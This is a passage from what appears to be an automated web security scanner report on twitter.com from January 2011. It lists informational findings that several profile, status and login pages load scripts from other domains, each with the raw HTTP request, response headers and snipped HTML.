<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.438. http://twitter.com/joemccann

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /joemccann

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /joemccann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-24458-21657
ETag: "2185bda414323413d07c805828e8deaa"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01186
Content-Type: text/html; charset=utf-8
Content-Length: 50599
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.439. http://twitter.com/jordanknight

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /jordanknight

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jordanknight HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-53407-37171
ETag: "a1dbaefbdb244bad17317656f8f51eb0"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.01240
Content-Type: text/html; charset=utf-8
Content-Length: 47864
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.440. http://twitter.com/kennychesney

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /kennychesney

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /kennychesney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:50:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265830-80729-13721
ETag: "3e686e5003db7b91a9692a9a7630bbcc"
Last-Modified: Sat, 29 Jan 2011 01:50:30 GMT
X-Runtime: 0.00912
Content-Type: text/html; charset=utf-8
Content-Length: 47073
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.441. http://twitter.com/kfaulk33

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /kfaulk33

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /kfaulk33 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:29 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265289-31703-49385
ETag: "41ff3b86a38408792b4fb731bddc8cc7"
Last-Modified: Sat, 29 Jan 2011 01:41:29 GMT
X-Runtime: 0.00715
Content-Type: text/html; charset=utf-8
Content-Length: 19131
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.442. http://twitter.com/lapubell

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /lapubell

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lapubell HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225026-90981-8371
ETag: "aa94e1eda1d46648c91aba85f6351309"
Last-Modified: Fri, 28 Jan 2011 14:30:26 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 38074
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.443. http://twitter.com/lapubell/status/28131682842312704

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /lapubell/status/28131682842312704

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lapubell/status/28131682842312704 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225027-9054-47693
ETag: "f065429d1dda5b9db71fafac7ff44f41"
Last-Modified: Fri, 28 Jan 2011 14:30:27 GMT
X-Runtime: 0.05699
Content-Type: text/html; charset=utf-8
Content-Length: 13805
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0Ogxjc3JmX2lkIiViYzI0ZWFiYzYx%250AZjk3NTNkYjBiMDU5MDZiZWFkZTZkNDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--73b1d4476b98de5154e4e6006eaf9f2cc116e66c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.444. http://twitter.com/lapubell/status/28131682842312704

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /lapubell/status/28131682842312704

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lapubell/status/28131682842312704 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:45 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234645-14826-4624
ETag: "64270e05655eab63cff29a5e020fda56"
Last-Modified: Fri, 28 Jan 2011 17:10:45 GMT
X-Runtime: 0.03143
Content-Type: text/html; charset=utf-8
Content-Length: 13675
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0OhVpbl9uZXdfdXNlcl9mbG93MDoM%250AY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMxMWM6DHR6%250AX25hbWUiFENlbnRyYWwgQW1lcmljYToPY3JlYXRlZF9hdGwrCDNO8MwtAToH%250AaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElD%250AOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNl%250AZHsA--a0d441ab5685422c52c69297972a6aff128d736b; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.445. http://twitter.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /login

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /login HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-89084-19137
ETag: "849e44ccdc2da8651621c818bd6cc65c"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.03302
Content-Type: text/html; charset=utf-8
Content-Length: 12714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


